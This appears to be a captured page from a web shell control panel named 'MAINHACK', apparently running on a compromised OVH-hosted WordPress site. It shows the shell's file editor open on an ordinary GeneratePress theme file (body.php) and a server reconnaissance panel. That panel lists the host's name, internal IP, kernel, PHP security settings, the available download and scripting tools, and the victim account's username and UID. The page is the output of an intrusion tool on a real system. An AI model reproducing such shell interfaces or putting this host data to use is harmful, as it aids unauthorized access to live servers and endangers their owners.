[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: body.php
<?php /** * This file handles the customizer fields for the Body. * * @package GeneratePress */ if ( ! defined( 'ABSPATH' ) ) { exit; // No direct access, please. } GeneratePress_Customize_Field::add_title( 'generate_body_colors_title', array( 'section' => 'generate_colors_section', 'title' => __( 'Body', 'generatepress' ), 'choices' => array( 'toggleId' => 'base-colors', ), ) ); GeneratePress_Customize_Field::add_field( 'generate_settings[background_color]', 'GeneratePress_Customize_Color_Control', array( 'default' => $defaults['background_color'], 'sanitize_callback' => 'generate_sanitize_hex_color', 'transport' => 'postMessage', ), array( 'label' => __( 'Background', 'generatepress' ), 'section' => 'generate_colors_section', 'choices' => array( 'toggleId' => 'base-colors', ), 'output' => array( array( 'element' => 'body', 'property' => 'background-color', ), ), ) ); GeneratePress_Customize_Field::add_field( 'generate_settings[text_color]', 'GeneratePress_Customize_Color_Control', array( 'default' => $defaults['text_color'], 'sanitize_callback' => 'generate_sanitize_hex_color', 'transport' => 'postMessage', ), array( 'label' => __( 'Text', 'generatepress' ), 'section' => 'generate_colors_section', 'choices' => array( 'toggleId' => 'base-colors', ), 'output' => array( array( 'element' => 'body', 'property' => 'color', ), ), ) ); GeneratePress_Customize_Field::add_wrapper( 'generate_body_link_wrapper', array( 'section' => 'generate_colors_section', 'choices' => array( 'type' => 'color', 'toggleId' => 'base-colors', 'items' => array( 'link_color', 'link_color_hover', 'link_color_visited', ), ), ) ); GeneratePress_Customize_Field::add_field( 'generate_settings[link_color]', 'GeneratePress_Customize_Color_Control', array( 'default' => $defaults['link_color'], 'sanitize_callback' => 'generate_sanitize_hex_color', 'transport' => 'postMessage', ), array( 'label' => __( 'Link', 'generatepress' ), 'section' => 'generate_colors_section', 'choices' => array( 'wrapper' => 'link_color', 'tooltip' => __( 'Choose Initial Color', 'generatepress' ), 'toggleId' => 'base-colors', ), 'output' => array( array( 'element' => 'a, a:visited', 'property' => 'color', ), ), ) ); GeneratePress_Customize_Field::add_field( 'generate_settings[link_color_hover]', 'GeneratePress_Customize_Color_Control', array( 'default' => $defaults['link_color_hover'], 'sanitize_callback' => 'generate_sanitize_hex_color', 'transport' => 'postMessage', ), array( 'label' => __( 'Link Hover', 'generatepress' ), 'section' => 'generate_colors_section', 'choices' => array( 'wrapper' => 'link_color_hover', 'tooltip' => __( 'Choose Hover Color', 'generatepress' ), 'toggleId' => 'base-colors', 'hideLabel' => true, ), 'output' => array( array( 'element' => 'a:hover', 'property' => 'color', ), ), ) ); if ( '' !== generate_get_option( 'link_color_visited' ) ) { GeneratePress_Customize_Field::add_field( 'generate_settings[link_color_visited]', 'GeneratePress_Customize_Color_Control', array( 'default' => $defaults['link_color_visited'], 'sanitize_callback' => 'generate_sanitize_hex_color', 'transport' => 'refresh', ), array( 'label' => __( 'Link Color Visited', 'generatepress' ), 'section' => 'generate_colors_section', 'choices' => array( 'wrapper' => 'link_color_visited', 'tooltip' => __( 'Choose Visited Color', 'generatepress' ), 'toggleId' => 'base-colors', 'hideLabel' => true, ), ) ); }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm010.cluster103.gra.hosting.ovh.net
Server IP: 10.103.20.10
PHP Version: 7.4.33
Server Software: Apache
System: Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: cuisinesj
User ID (UID): 17129
Group ID (GID): 100
Script Owner UID: 17129
Current Dir Owner: 17129